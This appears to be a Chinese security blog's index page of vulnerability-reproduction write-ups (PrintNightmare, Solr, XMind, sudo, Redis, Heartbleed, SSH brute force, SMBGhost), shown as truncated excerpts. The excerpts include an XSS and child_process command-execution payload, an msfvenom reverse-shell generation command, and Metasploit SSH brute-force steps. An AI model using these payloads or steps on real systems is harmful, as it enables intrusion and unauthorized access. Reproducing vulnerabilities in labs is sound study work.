各种漏洞复现
文章平均质量分 76
记录自己复现漏洞的过程
bye_X
低调求发展,潜心习安全!
展开
-
Windows Print Spooler远程代码执行漏洞复现(CVE-2021-1675)
目录漏洞概述漏洞复现一、PowerShell脚本实现本地提权二、Windows Print Spooler RCE域控MSF上线Cobalt Strike上线三、mimikatz武器化攻击漏洞防御参考链接漏洞概述Windows Print Spooler是Windows的打印机后台处理程序,广泛的应用于各种内网中,攻击者可以通过该漏洞绕过PfcAddPrinterDriver的安全验证,并在打印服务器中安装恶意的驱动程序。若攻击者所控制的用户在域中,则攻击者可以连接到DC中的Spooler服务,并利用该原创 2021-07-05 21:57:10 · 5071 阅读 · 2 评论 -
Apache Solr漏洞总结(比较全面的哦)
目录框架概述Wiki百科百度百科漏洞列表1.远程命令执行RCE(CVE-2017-12629)漏洞详情漏洞复现影响版本修复方案2.远程命令执行XXE(CVE-2017-12629)漏洞详情漏洞复现影响版本修复方案3.任意文件读取AND命令执行(CVE-2019-17558)漏洞详情漏洞复现3.1代码执行3.2任意文件读取影响版本修复方案4.远程命令执行漏洞(CVE-2019-0192)漏洞详情漏洞复现影响版本修复方案5.远程命令执行漏洞(CVE-2019-0193)漏洞详情漏洞复现影响版本修复方案6.未授权原创 2021-06-11 22:50:21 · 15391 阅读 · 4 评论 -
XMind 2020/2021 beat版本xss漏洞复现
XMind概述XMind 是一款非常实用的商业思维导图软件,应用全球最先进的Eclipse RCP 软件架构,全力打造易用、高效的可视化思维软件,强调软件的可扩展、跨平台、稳定性和性能,致力于使用先进的软件技术帮助用户真正意义上提高生产率。漏洞利用##证明xss payload<img src=x onerror=alert(/hack/)>##代码执行payloadrequire('child_process').exec('systeminfo',(error, stdout,原创 2021-05-12 01:45:15 · 619 阅读 · 2 评论 -
Linux sudo本地提权漏洞(CVE-2021-3156)
Linux sudo本地提权漏洞漏洞介绍Qualys研究小组在sudo中发现了堆溢出漏洞,这是一个几乎无处不在的实用工具,可以在主要的类Unix操作系统上使用。任何非特权用户都可以利用此漏洞在易受攻击的主机上使用默认sudo配置获得根权限。当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或 -i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出。只要存在sudoers文件(通常是 /etc/sudoers),攻击者就原创 2021-02-02 15:58:36 · 2448 阅读 · 6 评论 -
Redis未授权访问漏洞复现
Redis介绍redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set --有序集合)和hash(哈希类型)。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上,redis支持各种不同方式的排序。与memcached一样,为了保证效率,数据都是缓存在内存中。区别的是redis会周期性的把更新原创 2021-01-29 09:51:26 · 4207 阅读 · 1 评论 -
OpenSSL心脏滴血漏洞(CVE-2014-0160)
一、漏洞介绍2014年,互联网安全协议OpenSSL被爆出存在一种十分严重的漏洞。在黑客社区,被命名为“心脏滴血” ,黑客通过利用该漏洞,可以获取到%30开头的https网站的用户名和密码,漏洞还影响到使用OpenSSL加密的产品。二、漏洞分析OpenSSL是通过加密算法来保证数据通信的私密性。加密算法:对称加密算法(AES、DES、3DES)非对称加密算法(RSA/DSA/SHA/MD5)而OpenSSL是使用公开的非对称加密算法RSA来加密的。此次漏洞的成因是OpenSSL Heart原创 2020-11-10 20:38:28 · 9784 阅读 · 0 评论 -
ssh弱口令爆破
对目标主机的22端口进行弱口令爆破环境kali linux 攻击机metasploitable2 目标机步骤1、 打开终端利用nmap扫描工具对目标主机进行扫描 nmap -sT -v -O 192.168.235.140可以看到ssh的22号端口是打开着的2、 输入msfconsole 打开msf的终端窗口,输入search ssh_login可以看到相关的攻击载荷模块工具3、 msf终端中输入use auxiliary/scanner/ssh/ssh_login进入该攻击工具4原创 2020-08-08 12:00:01 · 11866 阅读 · 0 评论 -
Msf溢出phpMyAdmin
CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令环境kali linux 攻击机:ip 192.168.235.149metasploitable2 目标机:ip 192.168.235.140步骤1、 确保目标机与攻击机能够ping通2、 对目标主机进行端口扫描,使用nmap -sV -v 192.168.235.140可以看到Apache服务的端口是开着的3、 浏览器中输入地址192.168.235.140 访问目标主机4、 终端中输入dir转载 2020-08-08 11:50:16 · 488 阅读 · 0 评论 -
CVE-2016-0051(WebDaV)漏洞复现
MS16-016(WebDaV)漏洞复现目标机:win7x64 192.168.235.142攻击机:kali 192.168.235.1371、 确定目标主机和攻击机能够ping通2、 启动kaliLinux终端利用msfvenom生成后门 输入命令msfvenom -p(-p用来设置参数的) windows/meterpreter/reverse_tcp LHOST=192.168.235.137(LHOST用来设置本地主机ip) LPORT=2222(LPORT=2222用来设置本地监听端原创 2020-08-08 11:29:24 · 1693 阅读 · 0 评论 -
CVE-2020-0796 - SMBv3漏洞复现与提权
CVE-2020-0796 - SMBv3提权微软发布安全公告,发布了一个最新的SMB远程代码执行漏洞( CVE-2020-0796 )“永恒之黑”,攻击者可以利用漏洞进行提权实现代码执行。提权准备工作1、首先下载扫描器,进行检测下载地址:https://github.com/ollypwn/SMBGhostpython3 scanner.py <ip>将Windows目标机的防火墙关闭,让攻击机可以ping通ip可以看到2、下载好可利用的POChttps://gi原创 2020-06-06 16:42:44 · 4936 阅读 · 1 评论